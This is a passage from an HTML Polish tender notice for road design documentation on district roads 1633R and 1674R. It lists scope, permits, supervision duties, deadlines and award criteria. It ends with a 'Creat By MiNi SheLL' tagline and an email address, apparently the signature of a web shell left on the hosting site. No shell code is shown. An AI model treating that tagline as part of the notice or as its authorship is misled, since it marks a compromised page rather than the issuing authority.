5)Wykonawca dokumentacji projektowej zobowiązany jest do udzielania odpowiedzi na pytania zadane przez oferentów w trakcie postępowania o udzielenie zamówienia publicznego na realizację robót budowlanych w oparciu o dokumentację projektową, aż do wyłonienia wykonawcy robót oraz przygotowania ewentualnych modyfikacji dokumentacji projektowej wynikających z tych pytań i udzielanych odpowiedzi - w terminach wyznaczonych przez Zamawiającego. Zamawiający każdorazowo wyznaczy termin nie krótszy niż 2 dni robocze, a w przypadkach szczególnie złożonych nie krótszy niż 3 dni robocze od dnia przekazania przez Zamawiającego faksem lub e-mailem pisma z pytaniami Wykonawców robót
10. Zaleca się, aby Wykonawcy dokonali wizji lokalnej  terenu realizacji przedmiotu oraz w jego okolicy w celu dokonania     oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być konieczne do przygotowania oferty celem prawidłowej wyceny przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2- Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 1633R Rączyna-Rożwienica w m. Czudowice- chodnik jednostronny w km od 6+405 do km 7+385.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szczegółowy zakres przedmiotu zamówienia ( dla każdego zadania od 1-3) obejmuje wykonanie: 
   1) Projekt  budowlany- w  5 egz. (wraz z materiałami niezbędnymi do zgłoszenia robót ( lub pozwolenia na budowę w zależności od potrzeb wynikających z projektu wraz z uzgodnieniami) oraz mapę do celów projektowych.
   2) Projekt wykonawczy -w 5 egz. dla każdej branży, w tym:
    a) cześć opisowo-obliczeniową,
    b) część rysunkowa, 
    c)  przedmiary robót - w 2 egz.
     d) ) kosztorys inwestorski    -  w 2 egz.  
     e) Specyfikacje techniczne wykonania i odbioru robót - w 2 egz.
     f) projekt  stałej organizacji ruchu zatwierdzony przez Starostę Jarosławskiego- w 2 egz.
     g)opracowania projektu stałej i czasowej organizacji ruchu (wraz z niezbędnymi urządzeniami BRD);
2.  Uzgodnienia i opinie.
      Wykonawca w ramach podjętych działań, winien: 
            1) przygotować niezbędne materiały do wystąpienia o wszelkie uzgodnienia i opinie,
            2) uzyskać wszystkie, aktualne branżowe warunki techniczne od właścicieli lub zarządców urządzeń 
                kolidujących z projektowaną inwestycją drogową,
            3) przedłożyć ww. warunki Zamawiającemu do akceptacji, 
            4) przedłożyć Zamawiającemu do zaopiniowania ustalone i uściślone zakresy kolizji urządzeń obcych z 
                 inwestycją drogową na podstawie szczegółowych warunków technicznych,
            5) uzyskać wszelkie inne decyzje, uzgodnienia i opinie niezbędne do opracowania projektu budowlanego,
            6) wykonać  wszystkie dodatkowe opracowania wynikające z uzyskanych uzgodnień, niezbędnych do 
              uzyskania akceptacji przez właściwy organ zgłoszenia robót budowlanych nie wymagających pozwolenia na 
              budowę,
            7) uzyskać akceptację przez właściwy organ zgłoszenia robót budowlanych nie wymagających pozwolenia na 
               budowę lub uzyskania właściwej ostatecznej decyzji administracyjnej umożliwiającej wykonanie przedmiotu 
               zamówienia zgodnie z obowiązującymi przepisami
3.  Decyzja o środowiskowych uwarunkowaniach ( jeżeli będzie wymagana).
Do zakresu obowiązków Wykonawcy należy:
             1) opracowanie i przygotowanie wszystkich niezbędnych załączników do wniosku o wydanie decyzji o 
                  środowiskowych uwarunkowaniach, zgodnie z obowiązującymi przepisami;
              2) opracowanie i przygotowanie zgodnie z obowiązującymi przepisami raportu o oddziaływaniu 
                   przedsięwzięcia na środowisko (w przypadku nałożenia przez właściwy organ takiego obowiązku);
4.  Pozwolenie wodno-prawne ( jeżeli będzie wymagane).
      Do zakresu obowiązków Wykonawcy należy:
       1) opracowanie i przygotowanie wszystkich niezbędnych załączników do wniosku o wydanie pozwolenia wodno-
            prawnego wraz z kompletem dokumentów, zgodnie z obowiązującymi przepisami;
5. Nadzór autorski
    Wykonawca pełnić będzie nadzór autorski według potrzeb wynikających z realizacji robót oraz na każde wezwanie Zamawiającego dokonane telefonicznie lub pisemnie na 3 dni przed wymaganym spotkaniem. Obowiązki Wykonawcy w zakresie nadzoru autorskiego obejmować będą w szczególności:
           1) Nadzór nad zgodnością wykonawstwa robót budowlanych z dokumentacją projektową, stwierdzanie w toku wykonywania robót budowlanych zgodności ich realizacji z dokumentacją projektową, decyzją o pozwoleniu na budowę/decyzją o zezwoleniu na realizację inwestycji drogowej oraz zasadami wiedzy technicznej,
           2) Niezwłoczne informowanie Zamawiającego i Wykonawcy robót budowlanych o wszelkich dostrzeżonych błędach w realizacji inwestycji, a w szczególności o powstałych w trakcie budowy rozbieżnościach z dokumentacją projektową,
    3) Wyjaśnianie wątpliwości powstałych w toku realizacji robót budowlanych, dotyczących dokumentacji projektowej i zawartych w niej rozwiązań technicznych poprzez dodatkowe informacje i opracowania oraz ewentualne uszczegóławianie dokumentacji projektowej, uzupełnianie rysunków, detali bądź opisu technologii wykonania nie zawartych w dokumentacji projektowej,
   4) Poprawianie błędnych rozwiązań projektowych w ramach przedmiotowej umowy i oferty, 
   5) Nanoszenie poprawek lub uzupełnień na wszystkich egzemplarzach projektu w ramach przedmiotowej umowy i 
       oferty,
   6) Uzgadnianie z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych 
       w dokumentacji projektowej,
   7) Przedstawianie propozycji rozwiązań zamiennych w przypadku niemożności zastosowania rozwiązań występujących w dokumentacji projektowej lub gdy ich zastosowanie jest nieekonomiczne lub nieefektywne w świetle aktualnej wiedzy technicznej i zasad sztuki budowlanej, a koszt zastosowania nowych rozwiązań nie zwiększy kosztów zadania z zastrzeżeniem, że każde z rozwiązań musi być uprzednio zatwierdzone przez Zamawiającego,
     8) Czuwanie, by zakres wprowadzonych zmian nie spowodował istotnej zmiany w stosunku do zatwierdzonego projektu budowlanego, a w przypadku konieczności wprowadzenia zmian istotnych przygotowanie dokumentacji zamiennej w zakresie i formie umożliwiającej uzyskanie zamiennej decyzji o pozwoleniu na budowę/decyzji o zezwoleniu na realizację inwestycji drogowej,
     9) Udział, na każde wezwanie Zamawiającego, w komisjach, naradach technicznych, odbiorach robót 
        związanych z realizacją przedmiotowego projektu,
    10)Zapewnienie udziału przedstawicieli poszczególnych branż w sprawowaniu nadzoru autorskiego,
6. Wymogi formalno-prawne
 1) Poszczególne elementy dokumentacji projektowej  powinny być sprawdzone przez osobę  posiadającą  uprawnienia drogowe, 
    2 ) Oświadczenie projektanta i sprawdzającego, że opracowanie zostało wykonane zgodnie z umową, obowiązującymi przepisami i jest kompletne z punktu widzenia celu, któremu ma służyć oraz, że zostało sprawdzone (uwaga: dokumentacja projektowa ma spełniać wymogi określone w przepisach prawnych, normach, normatywach, katalogach, wytycznych i innych, niezbędnych przy realizacji zamówienia, obowiązujących w dniu przekazania dokumentacji Zamawiającemu )
   3) Projektant odpowiada za wady dokumentacji projektowej do czasu odbioru pogwarancyjnego    wybudowanego obiektu. Ujawnione wady Jednostka Projektująca zobowiązana jest usunąć w terminie określonym przez   Zamawiającego. Poprawki winny być naniesione w każdym egzemplarzu projektu budowlanego i wykonawczego jak również w nośnikach czytelnych dla urządzeń elektronicznego przetwarzania danych w okresie 3 lat .
  4)Ewentualne dodatkowe koszty budowy  wynikające z błędów projektowych, błędów     w przedmiarze robót lub wynikłe z braku odpowiednich pozycji przedmiaru pokrywa Projektant.
7. Oprócz wersji papierowej dokumentacja projektowa musi być zapisana w formie elektronicznej 
   ( edytowalnej) na nośniku CD/DVD ( w 1 egz), która winna być zaopatrzona w spis określający szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, w którym został zapisany). Wszystkie materiały 
   tekstowe takie jak    opisy techniczne, obliczenia, itp. muszą być zapisać w formatach  MS Word, AutoCAD i PDF,  przedmiary  i     kosztorysy  w  programie  kosztorysowym ( np. NORMA)   oraz PDF.  , części rysunkowe   w formacie  PDF i AutoCAD , a mapa do celów projektowych w formacie dwg lub dxf .
8. Wymagania dotyczące opracowania dokumentacji: 
1) Dokumentacja powinna posiadać wszelkie, wymagane obowiązującymi przepisami prawa uzgodnienia i opinie. 
2) Wykonawca przekaże Zamawiającemu kompletną  dokumentację, zgodne z umową obejmującą przedmiot zamówienia w siedzibie Zamawiającego .
3) Wykonawca opatrzy ww. opracowanie w wykaz zawartości dokumentacji oraz pisemne oświadczenie, że dostarczona dokumentacja jest wykonana zgodnie z postanowieniami umowy, zasadami współczesnej wiedzy technicznej oraz obowiązującymi przepisami i jest kompletna z punktu widzenia celu, któremu ma służyć.
4) Wykaz opracowań i pisemne oświadczenie, o których mowa powyżej stanowią integralną część przedmiotowego opracowania.
5) Zamawiający po otrzymaniu dokumentacji przystąpi do czynności odbioru, który zakończy się podpisaniem protokołu zdawczo-odbiorczego . W przypadku wystąpienia wad  w opracowaniu przedmiotu zamówienia  , Zamawiający zwróci Wykonawcy  opracowaną dokumentację z podaniem na piśmie przyczyn odmowy odbioru.
6) Rozliczenie wynagrodzenia za wykonaną usługę nastąpi na podstawie faktury końcowej wystawionej w oparciu o protokół odbioru przedmiotu wykonanego bez wad.
9. Wymagania dodatkowe: 
1) Wykonawca jest zobowiązany uzyskać wszelkie wymagane decyzje, pozwolenia, uzgodnienia i opinie niezbędne do zrealizowania inwestycji. Wszelkie opłaty i koszty związane z ich uzyskaniem ponosi Wykonawca.  
 2) Forma i treść opracowywanych wniosków o wydanie decyzji administracyjnych, pozwoleń, uzgodnień, opinii oraz forma, treść i liczba egzemplarzy materiałów będących załącznikami do wniosków o ich wydanie, muszą być zgodne z obowiązującymi wymaganiami organów, w dniu ich złożenia. 
3) Zamawiający zastrzega sobie prawo do uzyskiwania od Wykonawcy informacji o postępie prac i przyjętych rozwiązaniach w trakcie projektowania, jak również do składania swoich uwag, które Wykonawca uwzględni w dalszych pracach nad dokumentacją. 
4) Dokumentacja projektowa zostanie wykorzystana do przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane, w związku z powyższym jej treść nie może zawierać oznaczeń, znaków towarowych, patentów lub pochodzenia. W przypadku braku możliwości opisania treści dokumentacji za pomocą dostatecznie dokładnych określeń, dopuszcza się wskazanie znaku towarowego, patentu lub pochodzenia, nakładając obowiązek umieszczenia wyrazów lub równoważny oraz określenie zakresu równoważności
5)Wykonawca dokumentacji projektowej zobowiązany jest do udzielania odpowiedzi na pytania zadane przez oferentów w trakcie postępowania o udzielenie zamówienia publicznego na realizację robót budowlanych w oparciu o dokumentację projektową, aż do wyłonienia wykonawcy robót oraz przygotowania ewentualnych modyfikacji dokumentacji projektowej wynikających z tych pytań i udzielanych odpowiedzi - w terminach wyznaczonych przez Zamawiającego. Zamawiający każdorazowo wyznaczy termin nie krótszy niż 2 dni robocze, a w przypadkach szczególnie złożonych nie krótszy niż 3 dni robocze od dnia przekazania przez Zamawiającego faksem lub e-mailem pisma z pytaniami Wykonawców robót
10. Zaleca się, aby Wykonawcy dokonali wizji lokalnej  terenu realizacji przedmiotu oraz w jego okolicy w celu dokonania     oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być konieczne do przygotowania oferty celem prawidłowej wyceny przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr 3-Przeprojektowanie istniejącej dokumentacji na przebudowę drogi powiatowej Nr 1674R Lubaczów-Laszki-Duńkowice w km od 13+496 do km 31+011, do wymogów Programu Rozwoju Gminnej, i Powiatowej Infrastruktury Drogowej na lata 2016-2019..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Szczegółowy zakres przedmiotu zamówienia ( dla każdego zadania od 1-3) obejmuje wykonanie: 
   1) Projekt  budowlany- w  5 egz. (wraz z materiałami niezbędnymi do zgłoszenia robót ( lub pozwolenia na budowę w zależności od potrzeb wynikających z projektu wraz z uzgodnieniami) oraz mapę do celów projektowych.
   2) Projekt wykonawczy -w 5 egz. dla każdej branży, w tym:
    a) cześć opisowo-obliczeniową,
    b) część rysunkowa, 
    c)  przedmiary robót - w 2 egz.
     d) ) kosztorys inwestorski    -  w 2 egz.  
     e) Specyfikacje techniczne wykonania i odbioru robót - w 2 egz.
     f) projekt  stałej organizacji ruchu zatwierdzony przez Starostę Jarosławskiego- w 2 egz.
     g)opracowania projektu stałej i czasowej organizacji ruchu (wraz z niezbędnymi urządzeniami BRD);
2.  Uzgodnienia i opinie.
      Wykonawca w ramach podjętych działań, winien: 
            1) przygotować niezbędne materiały do wystąpienia o wszelkie uzgodnienia i opinie,
            2) uzyskać wszystkie, aktualne branżowe warunki techniczne od właścicieli lub zarządców urządzeń 
                kolidujących z projektowaną inwestycją drogową,
            3) przedłożyć ww. warunki Zamawiającemu do akceptacji, 
            4) przedłożyć Zamawiającemu do zaopiniowania ustalone i uściślone zakresy kolizji urządzeń obcych z 
                 inwestycją drogową na podstawie szczegółowych warunków technicznych,
            5) uzyskać wszelkie inne decyzje, uzgodnienia i opinie niezbędne do opracowania projektu budowlanego,
            6) wykonać  wszystkie dodatkowe opracowania wynikające z uzyskanych uzgodnień, niezbędnych do 
              uzyskania akceptacji przez właściwy organ zgłoszenia robót budowlanych nie wymagających pozwolenia na 
              budowę,
            7) uzyskać akceptację przez właściwy organ zgłoszenia robót budowlanych nie wymagających pozwolenia na 
               budowę lub uzyskania właściwej ostatecznej decyzji administracyjnej umożliwiającej wykonanie przedmiotu 
               zamówienia zgodnie z obowiązującymi przepisami
3.  Decyzja o środowiskowych uwarunkowaniach ( jeżeli będzie wymagana).
Do zakresu obowiązków Wykonawcy należy:
             1) opracowanie i przygotowanie wszystkich niezbędnych załączników do wniosku o wydanie decyzji o 
                  środowiskowych uwarunkowaniach, zgodnie z obowiązującymi przepisami;
              2) opracowanie i przygotowanie zgodnie z obowiązującymi przepisami raportu o oddziaływaniu 
                   przedsięwzięcia na środowisko (w przypadku nałożenia przez właściwy organ takiego obowiązku);
4.  Pozwolenie wodno-prawne ( jeżeli będzie wymagane).
      Do zakresu obowiązków Wykonawcy należy:
       1) opracowanie i przygotowanie wszystkich niezbędnych załączników do wniosku o wydanie pozwolenia wodno-
            prawnego wraz z kompletem dokumentów, zgodnie z obowiązującymi przepisami;
5. Nadzór autorski
    Wykonawca pełnić będzie nadzór autorski według potrzeb wynikających z realizacji robót oraz na każde wezwanie Zamawiającego dokonane telefonicznie lub pisemnie na 3 dni przed wymaganym spotkaniem. Obowiązki Wykonawcy w zakresie nadzoru autorskiego obejmować będą w szczególności:
           1) Nadzór nad zgodnością wykonawstwa robót budowlanych z dokumentacją projektową, stwierdzanie w toku wykonywania robót budowlanych zgodności ich realizacji z dokumentacją projektową, decyzją o pozwoleniu na budowę/decyzją o zezwoleniu na realizację inwestycji drogowej oraz zasadami wiedzy technicznej,
           2) Niezwłoczne informowanie Zamawiającego i Wykonawcy robót budowlanych o wszelkich dostrzeżonych błędach w realizacji inwestycji, a w szczególności o powstałych w trakcie budowy rozbieżnościach z dokumentacją projektową,
    3) Wyjaśnianie wątpliwości powstałych w toku realizacji robót budowlanych, dotyczących dokumentacji projektowej i zawartych w niej rozwiązań technicznych poprzez dodatkowe informacje i opracowania oraz ewentualne uszczegóławianie dokumentacji projektowej, uzupełnianie rysunków, detali bądź opisu technologii wykonania nie zawartych w dokumentacji projektowej,
   4) Poprawianie błędnych rozwiązań projektowych w ramach przedmiotowej umowy i oferty, 
   5) Nanoszenie poprawek lub uzupełnień na wszystkich egzemplarzach projektu w ramach przedmiotowej umowy i 
       oferty,
   6) Uzgadnianie z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych 
       w dokumentacji projektowej,
   7) Przedstawianie propozycji rozwiązań zamiennych w przypadku niemożności zastosowania rozwiązań występujących w dokumentacji projektowej lub gdy ich zastosowanie jest nieekonomiczne lub nieefektywne w świetle aktualnej wiedzy technicznej i zasad sztuki budowlanej, a koszt zastosowania nowych rozwiązań nie zwiększy kosztów zadania z zastrzeżeniem, że każde z rozwiązań musi być uprzednio zatwierdzone przez Zamawiającego,
     8) Czuwanie, by zakres wprowadzonych zmian nie spowodował istotnej zmiany w stosunku do zatwierdzonego projektu budowlanego, a w przypadku konieczności wprowadzenia zmian istotnych przygotowanie dokumentacji zamiennej w zakresie i formie umożliwiającej uzyskanie zamiennej decyzji o pozwoleniu na budowę/decyzji o zezwoleniu na realizację inwestycji drogowej,
     9) Udział, na każde wezwanie Zamawiającego, w komisjach, naradach technicznych, odbiorach robót 
        związanych z realizacją przedmiotowego projektu,
    10)Zapewnienie udziału przedstawicieli poszczególnych branż w sprawowaniu nadzoru autorskiego,
6. Wymogi formalno-prawne
 1) Poszczególne elementy dokumentacji projektowej  powinny być sprawdzone przez osobę  posiadającą  uprawnienia drogowe, 
    2 ) Oświadczenie projektanta i sprawdzającego, że opracowanie zostało wykonane zgodnie z umową, obowiązującymi przepisami i jest kompletne z punktu widzenia celu, któremu ma służyć oraz, że zostało sprawdzone (uwaga: dokumentacja projektowa ma spełniać wymogi określone w przepisach prawnych, normach, normatywach, katalogach, wytycznych i innych, niezbędnych przy realizacji zamówienia, obowiązujących w dniu przekazania dokumentacji Zamawiającemu )
   3) Projektant odpowiada za wady dokumentacji projektowej do czasu odbioru pogwarancyjnego    wybudowanego obiektu. Ujawnione wady Jednostka Projektująca zobowiązana jest usunąć w terminie określonym przez   Zamawiającego. Poprawki winny być naniesione w każdym egzemplarzu projektu budowlanego i wykonawczego jak również w nośnikach czytelnych dla urządzeń elektronicznego przetwarzania danych w okresie 3 lat .
  4)Ewentualne dodatkowe koszty budowy  wynikające z błędów projektowych, błędów     w przedmiarze robót lub wynikłe z braku odpowiednich pozycji przedmiaru pokrywa Projektant.
7. Oprócz wersji papierowej dokumentacja projektowa musi być zapisana w formie elektronicznej 
   ( edytowalnej) na nośniku CD/DVD ( w 1 egz), która winna być zaopatrzona w spis określający szczegółową zawartość (nazwa projektu, nazwa załącznika i nazwa pliku, w którym został zapisany). Wszystkie materiały 
   tekstowe takie jak    opisy techniczne, obliczenia, itp. muszą być zapisać w formatach  MS Word, AutoCAD i PDF,  przedmiary  i     kosztorysy  w  programie  kosztorysowym ( np. NORMA)   oraz PDF.  , części rysunkowe   w formacie  PDF i AutoCAD , a mapa do celów projektowych w formacie dwg lub dxf .
8. Wymagania dotyczące opracowania dokumentacji: 
1) Dokumentacja powinna posiadać wszelkie, wymagane obowiązującymi przepisami prawa uzgodnienia i opinie. 
2) Wykonawca przekaże Zamawiającemu kompletną  dokumentację, zgodne z umową obejmującą przedmiot zamówienia w siedzibie Zamawiającego .
3) Wykonawca opatrzy ww. opracowanie w wykaz zawartości dokumentacji oraz pisemne oświadczenie, że dostarczona dokumentacja jest wykonana zgodnie z postanowieniami umowy, zasadami współczesnej wiedzy technicznej oraz obowiązującymi przepisami i jest kompletna z punktu widzenia celu, któremu ma służyć.
4) Wykaz opracowań i pisemne oświadczenie, o których mowa powyżej stanowią integralną część przedmiotowego opracowania.
5) Zamawiający po otrzymaniu dokumentacji przystąpi do czynności odbioru, który zakończy się podpisaniem protokołu zdawczo-odbiorczego . W przypadku wystąpienia wad  w opracowaniu przedmiotu zamówienia  , Zamawiający zwróci Wykonawcy  opracowaną dokumentację z podaniem na piśmie przyczyn odmowy odbioru.
6) Rozliczenie wynagrodzenia za wykonaną usługę nastąpi na podstawie faktury końcowej wystawionej w oparciu o protokół odbioru przedmiotu wykonanego bez wad.
9. Wymagania dodatkowe: 
1) Wykonawca jest zobowiązany uzyskać wszelkie wymagane decyzje, pozwolenia, uzgodnienia i opinie niezbędne do zrealizowania inwestycji. Wszelkie opłaty i koszty związane z ich uzyskaniem ponosi Wykonawca.  
 2) Forma i treść opracowywanych wniosków o wydanie decyzji administracyjnych, pozwoleń, uzgodnień, opinii oraz forma, treść i liczba egzemplarzy materiałów będących załącznikami do wniosków o ich wydanie, muszą być zgodne z obowiązującymi wymaganiami organów, w dniu ich złożenia. 
3) Zamawiający zastrzega sobie prawo do uzyskiwania od Wykonawcy informacji o postępie prac i przyjętych rozwiązaniach w trakcie projektowania, jak również do składania swoich uwag, które Wykonawca uwzględni w dalszych pracach nad dokumentacją. 
4) Dokumentacja projektowa zostanie wykorzystana do przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane, w związku z powyższym jej treść nie może zawierać oznaczeń, znaków towarowych, patentów lub pochodzenia. W przypadku braku możliwości opisania treści dokumentacji za pomocą dostatecznie dokładnych określeń, dopuszcza się wskazanie znaku towarowego, patentu lub pochodzenia, nakładając obowiązek umieszczenia wyrazów lub równoważny oraz określenie zakresu równoważności
5)Wykonawca dokumentacji projektowej zobowiązany jest do udzielania odpowiedzi na pytania zadane przez oferentów w trakcie postępowania o udzielenie zamówienia publicznego na realizację robót budowlanych w oparciu o dokumentację projektową, aż do wyłonienia wykonawcy robót oraz przygotowania ewentualnych modyfikacji dokumentacji projektowej wynikających z tych pytań i udzielanych odpowiedzi - w terminach wyznaczonych przez Zamawiającego. Zamawiający każdorazowo wyznaczy termin nie krótszy niż 2 dni robocze, a w przypadkach szczególnie złożonych nie krótszy niż 3 dni robocze od dnia przekazania przez Zamawiającego faksem lub e-mailem pisma z pytaniami Wykonawców robót
10. Zaleca się, aby Wykonawcy dokonali wizji lokalnej  terenu realizacji przedmiotu oraz w jego okolicy w celu dokonania     oceny dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego oraz pozyskania wszelkich informacji, które mogą być konieczne do przygotowania oferty celem prawidłowej wyceny przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com